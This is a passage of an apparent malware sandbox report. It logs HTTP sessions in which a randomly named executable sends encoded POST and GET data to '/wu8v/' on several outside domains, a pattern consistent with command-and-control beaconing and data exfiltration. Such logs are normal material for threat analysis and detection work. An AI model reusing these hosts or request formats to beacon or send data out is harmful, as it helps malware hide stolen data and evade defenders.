                                                                                                                    Data Ascii: :#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is tempor
                                                                                                                    May 8, 2024 14:08:20.761228085 CEST1289INData Raw: 43 6f 72 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 3e 3c 74 68 3e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 4d 61 70 52 65 71 75 65 73 74 48 61 6e 64 6c
                                                                                                                    Data Ascii: Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td></t
                                                                                                                    May 8, 2024 14:08:21.091331005 CEST9INData Raw: 3c 2f 68 74 6d 6c 3e 20 0a
                                                                                                                    Data Ascii: </html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    44192.168.2.44978762.149.128.40802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:08:22.950635910 CEST457OUTGET /wu8v/?MdtlcTm=jVsDngfN17jo53xCVVHLBYy1RtgDvNhrjbHy79NIDh3y3n8I8UoARbyDj0OI5nlukHb+wqYtKmURqZRRAHON04+Cmz5V6OWL/4It3e8ivry7nxqUmvN5lOs=&_X=ClAdyH4P7rA8z HTTP/1.1
                                                                                                                    Host: www.insertcoen.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    May 8, 2024 14:08:23.281723022 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                    Cache-Control: private
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Server: Microsoft-IIS/8.5
                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                    Date: Wed, 08 May 2024 12:08:23 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 5097
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0; [TRUNCATED]
                                                                                                                    May 8, 2024 14:08:23.281857967 CEST1289INData Raw: 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30
                                                                                                                    Data Ascii: :#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;}
                                                                                                                    May 8, 2024 14:08:23.281960011 CEST1289INData Raw: 3a 23 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 7d 20 0a 2d 2d 3e 20 0a 3c 2f 73 74 79 6c 65 3e 20 0a 20 0a 3c 2f 68 65 61 64 3e 20 0a 3c 62 6f 64 79 3e 20 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 20 0a 3c 64 69 76
                                                                                                                    Data Ascii: :#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is tempor
                                                                                                                    May 8, 2024 14:08:23.281971931 CEST1289INData Raw: 43 6f 72 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 3e 3c 74 68 3e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 4d 61 70 52 65 71 75 65 73 74 48 61 6e 64 6c
                                                                                                                    Data Ascii: Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td></t
                                                                                                                    May 8, 2024 14:08:23.615241051 CEST159INData Raw: 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e 6b 2f 3f 4c 69 6e 6b 49 44 3d 36 32 32 39 33 26 61 6d 70 3b 49 49 53 37 30 45 72 72 6f 72 3d 34 30 34 2c 30 2c 30 78 38 30 30 37 30 30 30 32 2c 39 36 30 30 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f
                                                                                                                    Data Ascii: soft.com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,9600">View more information &raquo;</a></p> </fieldset> </div> </div> </body> </html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    45192.168.2.449788137.220.252.40802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:08:38.089293003 CEST715OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.387mfyr.sbs
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.387mfyr.sbs
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.387mfyr.sbs/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 58 50 47 76 35 41 5a 75 2b 72 43 6f 49 4c 66 66 67 77 6f 56 32 56 4a 6c 59 47 77 49 4d 6d 58 64 4c 41 76 36 4f 4e 44 6d 54 36 48 6d 2f 62 65 46 4d 62 74 58 4a 6f 6e 53 46 59 47 31 57 55 71 32 4a 4e 4f 4c 6d 31 37 39 79 6d 46 47 69 4a 6f 69 6c 35 43 61 72 59 4e 6b 4c 49 30 43 54 4b 68 72 35 6b 2f 34 6c 48 49 41 36 58 74 38 34 39 32 67 63 52 58 4f 7a 30 4b 6f 49 79 64 73 59 75 55 5a 37 52 4f 45 6a 66 42 63 37 4b 61 43 52 42 58 68 6c 4f 55 78 54 42 54 4d 36 36 76 57 64 48 7a 6d 37 6b 78 72 66 47 2b 47 6e 4f 62 42 54 39 68 38 4a 6c 2f 44 43 30 37 53 6b 46 71 6f 30 67 76 4b 44 51 3d 3d
                                                                                                                    Data Ascii: MdtlcTm=XPGv5AZu+rCoILffgwoV2VJlYGwIMmXdLAv6ONDmT6Hm/beFMbtXJonSFYG1WUq2JNOLm179ymFGiJoil5CarYNkLI0CTKhr5k/4lHIA6Xt8492gcRXOz0KoIydsYuUZ7ROEjfBc7KaCRBXhlOUxTBTM66vWdHzm7kxrfG+GnObBT9h8Jl/DC07SkFqo0gvKDQ==
                                                                                                                    May 8, 2024 14:08:38.361881018 CEST691INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:08:38 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 548
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    46192.168.2.449789137.220.252.40802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:08:41.099900007 CEST735OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.387mfyr.sbs
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.387mfyr.sbs
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.387mfyr.sbs/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 58 50 47 76 35 41 5a 75 2b 72 43 6f 4a 71 50 66 6d 68 6f 56 7a 31 4a 6d 64 47 77 49 57 57 57 61 4c 41 7a 36 4f 50 76 32 55 50 58 6d 2f 36 43 46 4c 61 74 58 4b 6f 6e 53 4b 34 47 77 53 55 71 35 4a 4e 53 6c 6d 33 76 39 79 6c 35 47 69 49 59 69 6c 49 43 64 71 49 4e 6d 45 6f 30 63 5a 71 68 72 35 6b 2f 34 6c 44 67 6d 36 58 6c 38 34 4d 6d 67 65 7a 7a 42 36 55 4b 72 66 43 64 73 4a 2b 56 51 37 52 4f 69 6a 62 41 33 37 4d 65 43 52 44 50 68 6d 66 55 79 5a 42 54 4b 31 61 75 55 56 47 44 74 79 45 39 68 53 6d 79 48 35 65 48 43 57 37 77 6d 59 55 65 55 51 30 66 68 35 43 6a 63 35 6a 53 44 59 51 36 55 67 2f 74 66 52 39 39 34 4d 76 5a 32 65 7a 65 6d 6d 33 4d 3d
                                                                                                                    Data Ascii: MdtlcTm=XPGv5AZu+rCoJqPfmhoVz1JmdGwIWWWaLAz6OPv2UPXm/6CFLatXKonSK4GwSUq5JNSlm3v9yl5GiIYilICdqINmEo0cZqhr5k/4lDgm6Xl84MmgezzB6UKrfCdsJ+VQ7ROijbA37MeCRDPhmfUyZBTK1auUVGDtyE9hSmyH5eHCW7wmYUeUQ0fh5Cjc5jSDYQ6Ug/tfR994MvZ2ezemm3M=
                                                                                                                    May 8, 2024 14:08:41.374042034 CEST691INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:08:41 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 548
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    47192.168.2.449790137.220.252.40802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:08:43.915498972 CEST10817OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.387mfyr.sbs
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.387mfyr.sbs
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.387mfyr.sbs/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 58 50 47 76 35 41 5a 75 2b 72 43 6f 4a 71 50 66 6d 68 6f 56 7a 31 4a 6d 64 47 77 49 57 57 57 61 4c 41 7a 36 4f 50 76 32 55 50 66 6d 2b 49 4b 46 4c 39 35 58 4c 6f 6e 53 48 59 47 78 53 55 71 67 4a 4e 4b 70 6d 33 69 66 79 6a 31 47 6b 61 51 69 74 64 69 64 6b 49 4e 6d 63 59 30 64 54 4b 68 69 35 67 62 38 6c 48 45 6d 36 58 6c 38 34 50 75 67 4e 42 58 42 32 30 4b 6f 49 79 64 67 59 75 55 35 37 52 48 58 6a 62 46 4d 37 38 2b 43 51 67 33 68 31 64 73 79 56 42 54 49 68 36 75 32 56 47 4f 31 79 45 77 65 53 6c 76 69 35 63 62 43 61 38 64 67 4c 67 50 53 47 32 48 38 71 69 4c 68 2b 6b 2b 78 63 51 79 4b 6e 61 74 72 52 38 6c 6d 41 65 77 2b 4d 79 47 45 37 41 75 49 58 6a 4f 46 63 53 55 68 56 75 2f 39 39 74 46 66 38 53 66 55 43 67 51 38 64 62 75 58 36 4e 30 51 78 76 49 78 53 52 7a 32 63 78 4e 57 33 51 4d 7a 6e 50 44 64 52 67 2b 38 4c 74 76 71 48 39 5a 4b 46 36 33 53 51 70 4a 69 4e 37 6b 69 6d 6e 44 2b 41 2f 7a 6b 4a 69 46 47 37 6c 72 43 43 74 4f 37 58 75 39 52 55 2b 5a 77 6b 45 57 74 39 45 62 61 4e 30 [TRUNCATED]
                                                                                                                    Data Ascii: MdtlcTm=XPGv5AZu+rCoJqPfmhoVz1JmdGwIWWWaLAz6OPv2UPfm+IKFL95XLonSHYGxSUqgJNKpm3ifyj1GkaQitdidkINmcY0dTKhi5gb8lHEm6Xl84PugNBXB20KoIydgYuU57RHXjbFM78+CQg3h1dsyVBTIh6u2VGO1yEweSlvi5cbCa8dgLgPSG2H8qiLh+k+xcQyKnatrR8lmAew+MyGE7AuIXjOFcSUhVu/99tFf8SfUCgQ8dbuX6N0QxvIxSRz2cxNW3QMznPDdRg+8LtvqH9ZKF63SQpJiN7kimnD+A/zkJiFG7lrCCtO7Xu9RU+ZwkEWt9EbaN0MoD29GH8FIHu7pZkD56xeHSBY4G9/cgy/WCRyWMDlO9mA5MBKxlRbO9VIRBzOvXe+WWeCoEnvm29IXXLU7zheFI4QUSQvZlrFfqBvhtiEieMnAA0eaKh/O2zbhkebn2VllsdutlYdb93e+fG3W2qD6hfVC7Y1WUOwDosDqmK8MygdWL2/5bm8gEgtCqzLVpDfhVeegylo5ExFomhszi9lPaHYNp79gh8VHACCCD+vRuHqjpe44k8XDoIIFb70E7saLUtTDwV28XNXJ+xBT+ymoCiI0Uaf78daBxL7ikpjPHWyL0Qbh8xL1rdbchqo5ykDqFumD4x52weAgPejKWJIeaP+zduMs9QFywTkh8ljbNNdA7e2Z6XrAQ4knf4hsRnMnzXiA+/YUdVzRYforCYNGpcpVq2y3HTZBryzXqFE//fZf5OBbTJgSLLDAChmVuQO6CefJyEs7qQ8mLYYBU7DzjA0us9lrWgb+yQcWwosXnibXZsXDR4sNUPkORdgp17KLoHuzRxCsiIeB4krRzZKeWcFdfRqx3kcZw54cOVppU+wVv+Zm0m0yPXaS3PUGmQCz164Afj+DPe0zarVtITB1pbdaoYIqbatcoHUGFch/YsbO5a2TT5WcVAYLpDqgh9haBApm2Pi21AgH67wWy5IQ+A3INahdHB3h [TRUNCATED]
                                                                                                                    May 8, 2024 14:08:44.187978029 CEST691INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:08:44 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 548
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    48192.168.2.449791137.220.252.40802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:08:46.724365950 CEST454OUTGET /wu8v/?MdtlcTm=aNuP63JR+qvwCLW62wwN2gNqXDVrMTryMQjODMfsZKfQm/+YFqgnBKvcT5agT2uiD/O4mE7g0mgXxPpAo7asqKVpcckEa+9XwCnOtQUj6EFGuNumSA/i+x0=&_X=ClAdyH4P7rA8z HTTP/1.1
                                                                                                                    Host: www.387mfyr.sbs
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    May 8, 2024 14:08:46.994688034 CEST691INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:08:46 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 548
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    49192.168.2.44979291.195.240.123802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:08:52.767493010 CEST706OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.lm2ue.us
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.lm2ue.us
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.lm2ue.us/wu8v/
